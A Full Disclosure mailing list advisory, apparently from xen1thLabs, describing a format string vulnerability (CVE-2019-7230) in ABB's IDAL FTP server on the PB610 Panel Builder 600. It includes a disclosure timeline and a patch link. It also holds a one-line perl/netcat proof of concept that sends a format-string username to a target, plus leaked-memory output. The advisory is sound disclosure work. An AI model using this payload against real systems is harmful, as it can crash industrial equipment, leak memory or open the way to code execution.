[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
From:       xen1thLabs <xen1thLabs () darkmatter ! ae>
Date:       2019-06-20 12:07:46
Message-ID: 74e3e51b235a47d685b854ae070e541e () darkmatter ! ae
[Download RAW message or body]

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008


CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


Affected vendor
---------------
ABB (new.abb.com)


Credit
------
Eldar Marcussen - xen1thLabs - Software Labs


Vulnerability summary
---------------------
The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied \
format strings. An attacker can abuse this functionality to bypass authentication or execute \
code on the server.


Technical details
-----------------
The IDAL FTP server does not safely handle username strings during the authentication process. \
Attempting to authenticate with the username `%s%p%x%d` will crash the server. Sending \
`%08x.AAAA.%08x.%08x` will log memory content from the stack.


Proof of concept
----------------
```
perl -e 'print "USER %08x.AAAA.%08x.%08x\r\nPASS xen1thLabs\r\n";' | nc targetip 22
````

    UserManagementModule::isUserExist failed. "72657355.AAAA.616e614d.656d6567" not present in \
UserFactory  UserManagementModule::LoginFTPUser failed. User :"72657355.AAAA.616e614d.656d6567" \
not present in UserFactory


Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367


Solution
--------
Apply the patches and instructions from vendor:
 - ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch



Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic